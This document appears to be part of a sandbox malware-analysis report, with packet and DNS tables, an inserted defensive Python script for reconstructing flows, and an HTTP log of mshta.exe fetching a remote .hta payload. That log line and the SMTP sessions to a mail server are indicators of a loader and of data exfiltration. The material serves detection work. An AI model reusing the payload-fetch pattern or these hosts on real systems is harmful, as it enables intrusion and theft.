Apr 24, 2024 06:45:30.406887054 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.406949043 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.407145023 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.407160997 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407179117 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407195091 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407205105 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407226086 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407322884 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.407339096 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407393932 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407413960 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407427073 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.407464981 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407496929 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407510996 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.407525063 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407541037 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407587051 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407603979 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.407605886 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407624006 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407668114 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.407669067 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407687902 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407720089 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.407727957 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407738924 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407742977 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.407767057 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407805920 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.407814980 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407828093 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.407872915 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407891989 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407912970 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.407921076 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407941103 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.407943010 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.407960892 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.408003092 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.408010960 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.408020973 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.408035994 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.408036947 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.408066034 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.408072948 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.408087969 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.408111095 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.408121109 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.408128977 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.408135891 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.408168077 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.408174038 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.408191919 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.408229113 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.408242941 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.408682108 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.408695936 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.408772945 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.408864021 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.408868074 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.408890963 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.408916950 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.408931017 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.409025908 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.409080029 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.409795046 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.409878969 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.410486937 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:32.146287918 CEST  49715        443        192.168.2.7      13.107.139.11
Apr 24, 2024 06:45:32.146337032 CEST  443          49715      13.107.139.11    192.168.2.7
Apr 24, 2024 06:45:32.146431923 CEST  49715        443        192.168.2.7      13.107.139.11
Apr 24, 2024 06:45:32.146895885 CEST  49715        443        192.168.2.7      13.107.139.11
Apr 24, 2024 06:45:32.146945000 CEST  443          49715      13.107.139.11    192.168.2.7
Apr 24, 2024 06:45:32.146998882 CEST  49715        443        192.168.2.7      13.107.139.11
Apr 24, 2024 06:45:32.169647932 CEST  49716        443        192.168.2.7      13.107.139.11
Apr 24, 2024 06:45:32.169672966 CEST  443          49716      13.107.139.11    192.168.2.7
Apr 24, 2024 06:45:32.169764996 CEST  49716        443        192.168.2.7      13.107.139.11
Apr 24, 2024 06:45:32.172575951 CEST  49716        443        192.168.2.7      13.107.139.11
Apr 24, 2024 06:45:32.172604084 CEST  443          49716      13.107.139.11    192.168.2.7
Apr 24, 2024 06:45:32.702203989 CEST  443          49716      13.107.139.11    192.168.2.7
Apr 24, 2024 06:45:32.702280045 CEST  49716        443        192.168.2.7      13.107.139.11
Apr 24, 2024 06:45:32.704461098 CEST  49716        443        192.168.2.7      13.107.139.11
Apr 24, 2024 06:45:32.704468012 CEST  443          49716      13.107.139.11    192.168.2.7
Apr 24, 2024 06:45:32.704943895 CEST  443          49716      13.107.139.11    192.168.2.7
Apr 24, 2024 06:45:32.749679089 CEST  49716        443        192.168.2.7      13.107.139.11
Apr 24, 2024 06:45:32.780083895 CEST  49716        443        192.168.2.7      13.107.139.11
Apr 24, 2024 06:45:32.820135117 CEST  443          49716      13.107.139.11    192.168.2.7
Apr 24, 2024 06:45:33.421539068 CEST  443          49716      13.107.139.11    192.168.2.7
Apr 24, 2024 06:45:33.421627998 CEST  443          49716      13.107.139.11    192.168.2.7
Apr 24, 2024 06:45:33.421705961 CEST  49716        443        192.168.2.7      13.107.139.11
Apr 24, 2024 06:45:33.425127029 CEST  49716        443        192.168.2.7      13.107.139.11
Apr 24, 2024 06:45:33.425152063 CEST  443          49716      13.107.139.11    192.168.2.7
Apr 24, 2024 06:45:42.800812006 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:42.998819113 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:42.998925924 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:43.317347050 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:43.321599007 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:43.519418955 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:43.519639015 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:43.718705893 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:43.777430058 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:43.990906000 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:43.990956068 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:43.990993023 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:43.991033077 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:44.018538952 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:44.216144085 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:44.228050947 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:44.425987005 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:44.429460049 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:44.628247023 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:44.629811049 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:44.867873907 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:44.929426908 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:44.929775953 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:45.127258062 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:45.127449989 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:45.127667904 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:45.365932941 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:45.376688957 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:45.376938105 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:45.574188948 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:45.574628115 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:45.575380087 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:45.575475931 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:45.575475931 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:45.575475931 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:45.773952007 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:45.774188995 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:45.774990082 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:46.002029896 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:46.198062897 CEST  587          49721      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:46.198143959 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:55.685764074 CEST  49722        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:55.883317947 CEST  587          49722      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:55.883415937 CEST  49722        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:56.168767929 CEST  587          49722      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:56.169078112 CEST  49722        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:56.281182051 CEST  49721        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:56.367539883 CEST  587          49722      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:56.371162891 CEST  49722        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:56.571888924 CEST  587          49722      192.185.124.132  192.168.2.7
Apr 24, 2024 06:45:56.586164951 CEST  49722        587        192.168.2.7      192.185.124.132
Apr 24, 2024 06:45:56.798649073 CEST  587          49722      192.185.124.132  192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:56.798669100 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:56.798686028 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:56.798763037 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:56.800883055 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:56.999397039 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:57.019771099 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:57.218019962 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:57.220863104 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:57.420227051 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:57.420819044 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:57.620695114 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:57.622181892 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:57.820223093 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:57.820528984 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:58.058994055 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:58.073995113 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:58.074249983 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:58.271661997 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:58.271716118 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:58.272418976 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:58.275434017 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:58.275510073 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:58.275510073 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:58.469975948 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:58.472726107 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:58.472783089 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:58.473804951 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:58.532788038 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:07.132564068 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:07.329796076 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:07.330622911 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:07.476818085 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:07.610466003 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:07.611737967 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:07.809578896 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:07.809763908 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:08.009613037 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:08.050410032 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:08.263571978 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:08.263592958 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:08.263634920 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:08.263705015 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:08.268737078 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:08.467062950 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:08.490350962 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:08.688333988 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:08.689194918 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:08.887985945 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:08.888386011 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:09.089030027 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.090152979 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:09.287764072 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.287997007 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:09.525734901 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.538885117 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.539113998 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:09.736296892 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.736398935 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.737016916 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:09.737098932 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:09.737098932 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:09.737118006 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:09.934755087 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.934777975 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.935269117 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.936124086 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:10.146812916 CEST49723587192.168.2.7192.185.124.132
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 24, 2024 06:45:17.126276970 CEST | 58493 | 53 | 192.168.2.7 | 1.1.1.1
Apr 24, 2024 06:45:17.757304907 CEST | 53 | 58493 | 1.1.1.1 | 192.168.2.7
Apr 24, 2024 06:45:24.540235043 CEST | 60829 | 53 | 192.168.2.7 | 1.1.1.1
Apr 24, 2024 06:45:24.855134964 CEST | 53 | 60829 | 1.1.1.1 | 192.168.2.7
Apr 24, 2024 06:45:31.982112885 CEST | 50588 | 53 | 192.168.2.7 | 1.1.1.1
Apr 24, 2024 06:45:33.428323984 CEST | 60145 | 53 | 192.168.2.7 | 1.1.1.1
Apr 24, 2024 06:45:42.232034922 CEST | 50189 | 53 | 192.168.2.7 | 1.1.1.1
Apr 24, 2024 06:45:42.785023928 CEST | 53 | 50189 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 24, 2024 06:45:17.126276970 CEST | 192.168.2.7 | 1.1.1.1 | 0x221c | Standard query (0) | www.sessosesso.it | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:45:24.540235043 CEST | 192.168.2.7 | 1.1.1.1 | 0xc5a | Standard query (0) | sessosesso.it | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:45:31.982112885 CEST | 192.168.2.7 | 1.1.1.1 | 0x6832 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:45:33.428323984 CEST | 192.168.2.7 | 1.1.1.1 | 0xadf5 | Standard query (0) | zyupsq.by.files.1drv.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:45:42.232034922 CEST | 192.168.2.7 | 1.1.1.1 | 0x5f0f | Standard query (0) | mail.irmaklarpaslanmaz.com.tr | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 24, 2024 06:45:17.757304907 CEST | 1.1.1.1 | 192.168.2.7 | 0x221c | No error (0) | www.sessosesso.it | | 89.46.106.29 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:45:24.855134964 CEST | 1.1.1.1 | 192.168.2.7 | 0xc5a | No error (0) | sessosesso.it | | 89.46.106.29 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:45:32.137315035 CEST | 1.1.1.1 | 192.168.2.7 | 0x6832 | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 06:45:32.137315035 CEST | 1.1.1.1 | 192.168.2.7 | 0x6832 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 06:45:32.137315035 CEST | 1.1.1.1 | 192.168.2.7 | 0x6832 | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 06:45:32.137315035 CEST | 1.1.1.1 | 192.168.2.7 | 0x6832 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.139.11 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:45:32.137315035 CEST | 1.1.1.1 | 192.168.2.7 | 0x6832 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.137.11 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:45:33.641360044 CEST | 1.1.1.1 | 192.168.2.7 | 0xadf5 | No error (0) | zyupsq.by.files.1drv.com | by-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 06:45:33.641360044 CEST | 1.1.1.1 | 192.168.2.7 | 0xadf5 | No error (0) | by-files.fe.1drv.com | odc-by-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 06:45:42.785023928 CEST | 1.1.1.1 | 192.168.2.7 | 0x5f0f | No error (0) | mail.irmaklarpaslanmaz.com.tr | | 192.185.124.132 | A (IP address) | IN (0x0001) | false
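The TCP packet table above records three client connections (local ports 49721, 49722 and 49723) to 192.185.124.132:587, and the DNS answer table shows that address was obtained by resolving mail.irmaklarpaslanmaz.com.tr shortly before. Port 587 is SMTP submission; a mail-submission session opened right after a document lure runs is the kind of flow an analyst wants pulled out of the per-packet rows and joined to the name that was resolved for it. The Python below is an added example, not part of the Joe Sandbox report: it rebuilds flows from rows in the table's column order and labels each flow with the hostnames whose A records resolved to its server IP. The input is a subset of rows transcribed from the two tables above (constructed input, written with "|" separators so the fields parse unambiguously); the analysis-host address 192.168.2.7 and the port-to-service labels are assumptions stated in the code.

```python
"""Rebuild TCP flows from Joe Sandbox per-packet rows and label them with DNS answers.

Added example, not part of the Joe Sandbox report. Everything below is
constructed input transcribed from the report's tables (a subset of rows).
"""
from collections import defaultdict
from datetime import datetime
import re

# Constructed input: a subset of the report's TCP packet rows, in the table's
# column order (timestamp, source port, dest port, source IP, dest IP).
TCP_ROWS = """
Apr 24, 2024 06:45:45.574628115 CEST | 587   | 49721 | 192.185.124.132 | 192.168.2.7
Apr 24, 2024 06:45:45.575380087 CEST | 49721 | 587   | 192.168.2.7     | 192.185.124.132
Apr 24, 2024 06:45:46.198143959 CEST | 49721 | 587   | 192.168.2.7     | 192.185.124.132
Apr 24, 2024 06:45:55.685764074 CEST | 49722 | 587   | 192.168.2.7     | 192.185.124.132
Apr 24, 2024 06:45:55.883317947 CEST | 587   | 49722 | 192.185.124.132 | 192.168.2.7
Apr 24, 2024 06:45:58.532788038 CEST | 49722 | 587   | 192.168.2.7     | 192.185.124.132
Apr 24, 2024 06:46:07.132564068 CEST | 49723 | 587   | 192.168.2.7     | 192.185.124.132
Apr 24, 2024 06:46:07.329796076 CEST | 587   | 49723 | 192.185.124.132 | 192.168.2.7
Apr 24, 2024 06:46:10.146812916 CEST | 49723 | 587   | 192.168.2.7     | 192.185.124.132
"""

# Constructed input: the A records from the report's DNS answer table (name, address).
DNS_A_ANSWERS = [
    ("www.sessosesso.it", "89.46.106.29"),
    ("sessosesso.it", "89.46.106.29"),
    ("dual-spov-0006.spov-msedge.net", "13.107.139.11"),
    ("dual-spov-0006.spov-msedge.net", "13.107.137.11"),
    ("mail.irmaklarpaslanmaz.com.tr", "192.185.124.132"),
]

# Assumption: the sandbox VM is the 192.168.2.7 end of every row in this report.
ANALYSIS_HOST = "192.168.2.7"
# Assumption: service labels for the mail ports a stealer typically pushes loot through.
MAIL_PORTS = {25: "smtp", 465: "smtps", 587: "smtp-submission"}

_TS_RE = re.compile(r"^(?P<date>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) (?P<tz>\w+)$")


def parse_timestamp(text):
    """Parse 'Apr 24, 2024 06:45:45.574628115 CEST' into a naive datetime.

    The report prints nine fractional digits but strptime's %f takes at most six,
    so the fraction is truncated to microseconds. The zone label is dropped: every
    row in one report shares it, so durations computed by subtraction stay correct.
    """
    m = _TS_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised timestamp: %r" % text)
    micro = m.group("frac")[:6].ljust(6, "0")
    return datetime.strptime("%s.%s" % (m.group("date"), micro), "%b %d, %Y %H:%M:%S.%f")


def parse_rows(text):
    """Yield (timestamp, sport, dport, sip, dip) from '|'-separated rows, skipping blanks."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sport, dport, sip, dip = [field.strip() for field in line.split("|")]
        yield parse_timestamp(ts), int(sport), int(dport), sip, dip


def summarize_flows(tcp_text, dns_a_answers, client_ip=ANALYSIS_HOST):
    """Group packets into flows keyed on (client port, server IP, server port).

    Direction is taken from which end is the analysis host, so packets are counted
    as 'out' (client to server) or 'in' regardless of how the row lists the endpoints.
    Each flow is labelled with the hostnames whose A records resolved to its server IP.
    """
    ip_to_names = defaultdict(set)
    for name, addr in dns_a_answers:
        ip_to_names[addr].add(name)

    flows = {}
    for ts, sport, dport, sip, dip in parse_rows(tcp_text):
        if sip == client_ip:
            key, direction = (sport, dip, dport), "out"
        elif dip == client_ip:
            key, direction = (dport, sip, sport), "in"
        else:
            continue  # row does not involve the analysis host
        flow = flows.setdefault(key, {
            "client_port": key[0], "server_ip": key[1], "server_port": key[2],
            "out": 0, "in": 0, "first": ts, "last": ts,
        })
        flow[direction] += 1
        flow["first"] = min(flow["first"], ts)
        flow["last"] = max(flow["last"], ts)

    result = []
    for flow in sorted(flows.values(), key=lambda f: f["first"]):
        flow["duration_s"] = (flow["last"] - flow["first"]).total_seconds()
        flow["hostnames"] = sorted(ip_to_names.get(flow["server_ip"], ()))
        flow["service"] = MAIL_PORTS.get(flow["server_port"])
        # A mail-submission session opened by a document lure is worth a look whatever
        # the payload turns out to be; the hostname join shows why the IP was contacted.
        flow["suspect_mail_exfil"] = flow["service"] is not None
        result.append(flow)
    return result


if __name__ == "__main__":
    for flow in summarize_flows(TCP_ROWS, DNS_A_ANSWERS):
        print("%(client_port)s -> %(server_ip)s:%(server_port)s %(hostnames)s "
              "out=%(out)d in=%(in)d %(duration_s).3fs suspect=%(suspect_mail_exfil)s" % flow)
```

The direction test keys on the analysis host rather than on which port looks ephemeral, because the report lists the server as the source whenever the packet travels server-to-client; keying on port numbers would split each connection into two flows. Note that the DNS join only uses A records, so a server reached through a CNAME chain is labelled with the final name that carried the address, not the name the sample queried.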
                                                                                                                          • www.sessosesso.it
                                                                                                                          • sessosesso.it
                                                                                                                          • onedrive.live.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49705 | 89.46.106.29 | 443 | 7260 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 04:45:18 UTC | 337 | OUT | GET /assets/aw/yt.hta HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-CH
                                                                                                                          UA-CPU: AMD64
                                                                                                                          Accept-Encoding: gzip, deflate
